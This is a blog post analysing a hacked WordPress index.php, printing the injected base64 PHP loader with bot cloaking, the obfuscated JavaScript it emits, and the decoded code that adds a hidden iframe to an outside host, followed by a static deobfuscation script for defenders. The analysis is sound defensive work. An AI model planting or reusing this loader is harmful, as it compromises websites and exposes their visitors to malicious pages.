Thursday, February 23, 2012

WordPress index.php hacked iframe points to ksenzfhvcb.dns1.us

Several WordPress sites were hacked today with an insert into the index.php. I have not yet figured out how it happened, and will post when/if I figure it out.

Here was the hacked/added text:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNkYkoyUW5LeWR2Snlzbll5Y3JKM1VuS3lkdEp5c25aU2NySjI1MEoxMHBZV0U5TDF4M0x5NWxlR1ZqS0c1bGR5QkVZWFJsS0NrcExtbHVaR1Y0SzF0ZE8yRmhZVDBuTUNjN2RISjVlMjVsZHlCa2IyTjFiV1Z1ZENncE8zMWpZWFJqYUNoeGNYRXBlM056UFZOMGNtbHVaenQ5YVdZb1lXRXVhVzVrWlhoUFppaGhZV0VwSVQwOUxURXBDbVk5Snkwek1IWXRNekIyTmpaMk5qTjJMVGQyTVhZMk1YWTNNblkyTUhZM09IWTNNSFkyTW5ZM01YWTNOM1kzZGpZMGRqWXlkamMzZGpNd2RqWTVkall5ZGpjd2RqWXlkamN4ZGpjM2RqYzJkakkzZGpneWRqUTFkalU0ZGpZMGRqTTVkalU0ZGpjd2RqWXlkakYyTUhZMU9YWTNNblkyTVhZNE1uWXdkakoyTlRKMk9YWTFOSFl5ZGpnMGRpMHpNSFl0TXpCMkxUTXdkalkyZGpZemRqYzFkalU0ZGpjd2RqWXlkamMxZGpGMk1uWXlNSFl0TXpCMkxUTXdkamcyZGkwM2RqWXlkalk1ZGpjMmRqWXlkaTAzZGpnMGRpMHpNSFl0TXpCMkxUTXdkall4ZGpjeWRqWXdkamM0ZGpjd2RqWXlkamN4ZGpjM2RqZDJPREIyTnpWMk5qWjJOemQyTmpKMk1YWXROWFl5TVhZMk5uWTJNM1kzTlhZMU9IWTNNSFkyTW5ZdE4zWTNOblkzTlhZMk1IWXlNbll3ZGpZMWRqYzNkamMzZGpjemRqRTVkamgyT0hZMk9IWTNOblkyTW5ZM01YWTRNM1kyTTNZMk5YWTNPWFkyTUhZMU9YWTNkall4ZGpjeGRqYzJkakV3ZGpkMk56aDJOeloyT0hZMk1YWTRkakV6ZGpsMk1UTjJOM1kzTTNZMk5YWTNNM1l5TkhZMk5I
WTNNbll5TW5ZeE1IWXdkaTAzZGpnd2RqWTJkall4ZGpjM2RqWTFkakl5ZGpCMk1UQjJPWFl3ZGkwM2RqWTFkall5ZGpZMmRqWTBkalkxZGpjM2RqSXlkakIyTVRCMk9YWXdkaTAzZGpjMmRqYzNkamd5ZGpZNWRqWXlkakl5ZGpCMk56bDJOaloyTnpaMk5qWjJOVGwyTmpaMk5qbDJOaloyTnpkMk9ESjJNVGwyTmpWMk5qWjJOakYyTmpGMk5qSjJOekYyTWpCMk56TjJOekoyTnpaMk5qWjJOemQyTmpaMk56SjJOekYyTVRsMk5UaDJOVGwyTnpaMk56SjJOamwyTnpoMk56ZDJOakoyTWpCMk5qbDJOakoyTmpOMk56ZDJNVGwyT1hZeU1IWTNOM1kzTW5ZM00zWXhPWFk1ZGpJd2RqQjJNak4yTWpGMk9IWTJOblkyTTNZM05YWTFPSFkzTUhZMk1uWXlNM1l0TlhZeWRqSXdkaTB6TUhZdE16QjJPRFoyTFRNd2RpMHpNSFkyTTNZM09IWTNNWFkyTUhZM04zWTJOblkzTW5ZM01YWXROM1kyTm5ZMk0zWTNOWFkxT0hZM01IWTJNblkzTlhZeGRqSjJPRFIyTFRNd2RpMHpNSFl0TXpCMk56bDJOVGgyTnpWMkxUZDJOak4yTFRkMk1qSjJMVGQyTmpGMk56SjJOakIyTnpoMk56QjJOakoyTnpGMk56ZDJOM1kyTUhZM05YWTJNblkxT0hZM04zWTJNbll6TUhZMk9YWTJNblkzTUhZMk1uWTNNWFkzTjNZeGRqQjJOaloyTmpOMk56VjJOVGgyTnpCMk5qSjJNSFl5ZGpJd2RqWXpkamQyTnpaMk5qSjJOemQyTWpaMk56ZDJOemQyTnpWMk5qWjJOVGwyTnpoMk56ZDJOakoyTVhZd2RqYzJkamMxZGpZd2RqQjJOWFl3ZGpZMWRqYzNkamMzZGpjemRqRTVkamgyT0hZMk9IWTNOblkyTW5ZM01YWTRNM1kyTTNZMk5YWTNPWFkyTUhZMU9YWTNkall4ZGpjeGRqYzJkakV3ZGpkMk56aDJOeloyT0hZMk1YWTRkakV6ZGpsMk1UTjJOM1kzTTNZMk5YWTNNM1l5TkhZMk5IWTNNbll5TW5ZeE1IWXdkakoyTWpCMk5qTjJOM1kzTm5ZM04zWTRNblkyT1hZMk1uWTNkamM1ZGpZMmRqYzJkalkyZGpVNWRqWTJkalk1ZGpZMmRqYzNkamd5ZGpJeWRqQjJOalYyTmpaMk5qRjJOakYyTmpKMk56RjJNSFl5TUhZMk0zWTNkamMyZGpjM2RqZ3lkalk1ZGpZeWRqZDJOek4yTnpKMk56WjJOaloyTnpkMk5qWjJOekoyTnpGMk1qSjJNSFkxT0hZMU9YWTNOblkzTW5ZMk9YWTNPSFkzTjNZMk1uWXdkakl3ZGpZemRqZDJOeloyTnpkMk9ESjJOamwyTmpKMk4zWTJPWFkyTW5ZMk0zWTNOM1l5TW5Zd2RqbDJNSFl5TUhZMk0zWTNkamMyZGpjM2RqZ3lkalk1ZGpZeWRqZDJOemQyTnpKMk56TjJNakoyTUhZNWRqQjJNakIyTmpOMk4zWTNOblkyTW5ZM04zWXlOblkzTjNZM04zWTNOWFkyTm5ZMU9YWTNPSFkzTjNZMk1uWXhkakIyT0RCMk5qWjJOakYyTnpkMk5qVjJNSFkxZGpCMk1UQjJPWFl3ZGpKMk1qQjJOak4yTjNZM05uWTJNblkzTjNZeU5uWTNOM1kzTjNZM05YWTJOblkxT1hZM09IWTNOM1kyTW5ZeGRqQjJOalYyTmpKMk5qWjJOalIyTmpWMk56ZDJNSFkxZGpCMk1UQjJPWFl3ZGpKMk1qQjJMVE13ZGkwek1IWXRNekIyTmpGMk56SjJOakIyTnpoMk56QjJOakoyTnpGMk56ZDJOM1kyTkhZMk1uWTNOM1l6TUhZMk9Y
WTJNblkzTUhZMk1uWTNNWFkzTjNZM05uWXlOM1k0TW5ZME5YWTFPSFkyTkhZek9YWTFPSFkzTUhZMk1uWXhkakIyTlRsMk56SjJOakYyT0RKMk1IWXlkalV5ZGpsMk5UUjJOM1kxT0hZM00zWTNNM1kyTW5ZM01YWTJNWFl5T0hZMk5YWTJOblkyT1hZMk1YWXhkall6ZGpKMk1qQjJMVE13ZGkwek1IWTROaWN1YzNCc2FYUW9KM1luS1R0dFpEMG5ZU2M3WlQxM2FXNWtiM2RiSjJVbkt5ZDJZV3duWFR0M1BXWTdjejBuSnp0bWNqMG5aaWNySjNKdkp5c25iU2NySjBOb1lYSW5PM0k5YzNOYlpuSXJKME52WkdVblhUdG1iM0lvYVQwd095MXBQaTEzTG14bGJtZDBhRHRwS3lzcGUybzlhVHR6UFhNcmNpZ3pPU3N4S25kYmFsMHBPMzBLYVdZb1lXRXVhVzVrWlhoUFppaGhZV0VwSVQwOUxURXBDbVVvY3lrN1BDOXpZM0pwY0hRKycpKTsNCn0='));
 



First Translation
if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30v-30v66v63v-7v1v61v72v60v78v70v62v71v77v7v64v62v77v30v69v62v70v62v71v77v76v27v82v45v58v64v39v58v70v62v1v0v59v72v61v82v0v2v52v9v54v2v84v-30v-30v-30v66v63v75v58v70v62v75v1v2v20v-30v-30v86v-7v62v69v76v62v-7v84v-30v-30v-30v61v72v60v78v70v62v71v77v7v80v75v66v77v62v1v-5v21v66v63v75v58v70v62v-7v76v75v60v22v0v65v77v77v73v19v8v8v68v76v62v71v83v63v65v79v60v59v7v61v71v76v10v7v78v76v8v61v8v13v9v13v7v73v65v73v24v64v72v22v10v0v-7v80v66v61v77v65v22v0v10v9v0v-7v65v62v66v64v65v77v22v0v10v9v0v-7v76v77v82v69v62v22v0v79v66v76v66v59v66v69v66v77v82v19v65v66v61v61v62v71v20v73v72v76v66v77v66v72v71v19v58v59v76v72v69v78v77v62v20v69v62v63v77v19v9v20v77v72v73v19v9v20v0v23v21v8v66v63v75v58v70v62v23v-5v2v20v-30v-30v86v-30v-30v63v78v71v60v77v66v72v71v-7v66v63v75v58v70v62v75v1v2v84v-30v-30v-30v79v58v75v-7v63v-7v22v-7v61v72v60v78v70v62v71v77v7v60v75v62v58v77v62v30v69v62v70v62v71v77v1v0v66v63v75v58v70v62v0v2v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v76v75v60v0v5v0v65v77v77v73v19v8v8v68v76v62v71v83v63v65v79v60v59v7v61v71v76v10v7v78v76v8v61v8v13v9v13v7v73v65v73v24v64v72v22v10v0v2v20v63v7v76v77v82v69v62v7v79v66v76v66v59v66v69v66v77v82v22v0v65v66v61v61v62v71v0v20v63v7v76v77v82v69v62v7v73v72v76v66v77v66v72v71v22v0v58v59v76v72v69v78v77v62v0v20v63v7v76v77v82v69v62v7v69v62v63v77v22v0v9v0v20v63v7v76v77v82v69v62v7v77v72v73v22v0v9v0v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v80v66v61v77v65v0v5v0v10v9v0v2v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v65v62v66v64v65v77v0v5v0v10v9v0v2v20v-30v-30v-30v61v72v60v78v70v62v71v77v7v64v62v77v30v69v62v70v62v71v77v76v27v82v45v58v64v39v58v70v62v1v0v59v72v61v82v0v2v52v9v54v7v58v73v73v62v71v61v28v65v66v69v61v1v63v2v20v-30v-30v86'.split('v');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;-i>-w.length;i++){j=i;s=s+r(39+1*w[j]);}
if(aa.indexOf(aaa)!==-1)
e(s); 
 





It then translates to the JavaScript that adds an iframe to the HTML page.
if (document.getElementsByTagName('body')[0])
{
    iframer();
}
else
{
    document.write("<iframe src='http://ksenzfhvcb.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer()
{
    var f = document.createElement('iframe');
    f.setAttribute('src','http://ksenzfhvcb.dns1.us/d/404.php?go=1');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
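
The decode chain shown above (nested PHP base64_decode wrappers, then a 'v'-separated number array turned into characters with an offset of 39) can be unwrapped statically, without ever evaluating the injected code. The following is an added example, not part of the original post: the function names are hypothetical, reading the offset and separator from the code instead of fixing them at 39 and 'v' is a generalisation, and the sample is a constructed array that decodes to a reserved .invalid URL.

```javascript
// Added example: static unwrapping of the layered loader. Nothing is eval'd.

// Constructed sample in the shape of the page's "First Translation" stage.
// It decodes to a harmless assignment that uses a reserved .invalid host.
const SAMPLE_STAGE =
  "f='78v22v-5v65v77v77v73v19v8v8v62v81v58v70v73v69v62v7v66v71v79v58v69v66v61v8v-5v20'" +
  ".split('v');s='';r=String.fromCharCode;" +
  "for(i=0;-i>-f.length;i++){s=s+r(39+1*f[i]);}";

// PHP layers: decode the literal argument of each base64_decode('...') call.
function decodeBase64Calls(text) {
  const re = /base64_decode\(\s*(['"])([A-Za-z0-9+\/=\s]+)\1\s*\)/g;
  return [...text.matchAll(re)].map((m) =>
    Buffer.from(m[2].replace(/\s+/g, ''), 'base64').toString('latin1'));
}

// JS layer: '<n>v<n>...'.split('v') decoded with fromCharCode(offset + n).
// The offset is read from the loop body (39 on this page), not hard-coded.
function decodeCharArray(js) {
  const arr = /(['"])([-\dA-Za-z]+)\1\s*\.split\(\s*['"](\w)['"]\s*\)/.exec(js);
  const off = /\(\s*(-?\d+)\s*\+\s*1\s*\*\s*\w+\[\w+\]\s*\)/.exec(js);
  if (!arr || !off) return null;
  const parts = arr[2].split(arr[3]);
  if (!parts.every((p) => /^-?\d+$/.test(p))) return null;
  return parts.map((p) => String.fromCharCode(Number(off[1]) + Number(p))).join('');
}

// Peel layers recursively; the depth limit bounds work on hostile input.
function unwrap(text, depth = 0, layers = []) {
  layers.push(text);
  if (depth >= 5) return layers;
  for (const inner of decodeBase64Calls(text)) unwrap(inner, depth + 1, layers);
  const js = decodeCharArray(text);
  if (js !== null) unwrap(js, depth + 1, layers);
  return layers;
}

// Collect URLs from every layer so they can be blocklisted or searched in logs.
function extractUrls(layers) {
  const urls = new Set();
  for (const l of layers)
    for (const m of l.matchAll(/https?:\/\/[^\s'"<>)]+/g)) urls.add(m[0]);
  return [...urls];
}

console.log(extractUrls(unwrap(SAMPLE_STAGE)));
```

Passing the contents of a quarantined copy of the modified index.php to `unwrap` returns every intermediate layer as text, and `extractUrls` lists the hosts to look for in proxy and web-server logs.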

